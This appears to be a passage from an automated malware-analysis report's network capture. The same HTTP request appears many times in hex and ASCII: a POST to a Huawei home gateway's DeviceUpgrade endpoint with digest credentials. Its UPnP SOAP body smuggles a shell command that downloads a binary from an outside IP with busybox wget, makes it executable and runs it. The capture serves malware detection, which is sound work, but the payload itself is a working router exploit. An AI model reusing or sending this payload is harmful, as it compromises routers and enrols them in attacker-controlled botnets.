61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
